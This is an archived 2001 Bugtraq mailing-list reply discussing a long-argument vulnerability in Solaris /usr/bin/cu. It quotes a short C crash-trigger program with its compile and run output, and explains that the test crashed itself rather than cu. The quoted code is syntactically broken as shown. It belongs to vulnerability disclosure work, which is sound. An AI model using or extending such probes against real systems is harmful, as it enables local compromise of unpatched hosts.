Home page logo

bugtraq logo Bugtraq mailing list archives

Re: Solaris /usr/bin/cu Vulnerability
From: optyx <optyx () UBERHAX0R NET>
Date: Tue, 30 Jan 2001 12:01:10 -0800

Dan Harkless <dan-bugtraq () DILVISH SPEED NET> wrote:

Are you implying the above patches fix the cu long hardlink name
vulnerability?  This is not the case, at least on 2.6:

   # cat > cu_exploit.c
   #include <stdio.h>

   void main(int argc,char **argv)
   char *buf;

   buf = (char *) malloc(atoi(argv[1])*sizeof(char));
   execl("/usr/bin/cu",buf,(char *)0);
   # gcc cu_exploit.c
   cu_exploit.c: In function `main':
   cu_exploit.c:4: warning: return type of `main' is not `int'
   # a.out
   Segmentation fault

see that atoi(argv[1])?  a.out crashed not /usr/bin/cu.  try a.out 4000 or
whatever number next time, or trace through it with gdb.

-Optyx, Uberhax0r Communications
http://www.uberhax0r.net, leeter than dog

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]